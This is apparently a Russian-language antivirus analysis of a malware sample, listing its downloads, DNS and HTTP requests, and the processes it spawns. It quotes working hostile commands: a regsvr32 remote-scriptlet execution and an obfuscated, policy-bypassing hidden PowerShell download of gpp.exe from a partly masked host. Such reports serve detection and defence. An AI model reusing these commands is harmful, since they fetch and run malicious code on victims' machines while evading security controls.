Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://fa##.com/gpp.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\regsvr32.exe' -s -N /U -i:http://fa##.com/gpsct.sct scrOBj.dLL
Сетевая активность
TCP
Запросы HTTP GET
- http://fa##.com/gpsct.sct
- http://fa##.com/gpp.exe
UDP
- DNS ASK fa##.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\regsvr32.exe' -s -N /U -i:http://fa##.com/gpsct.sct scrOBj.dLL' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c POwERsHELL.eXE -EX BYpaSs -NoP -w 1 sEt-CoNTent -VA ( NeW-obJect Net.webCLIEnT ).DoWNLoaddatA( 'http://fa##.com/gpp.exe' ) -En byTe -patH '%APPDATA%\jhdfhj...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/c POwERsHELL.eXE -EX BYpaSs -NoP -w 1 sEt-CoNTent -VA ( NeW-obJect Net.webCLIEnT ).DoWNLoaddatA( 'http://fa##.com/gpp.exe' ) -En byTe -patH '%APPDATA%\jhdfhj...
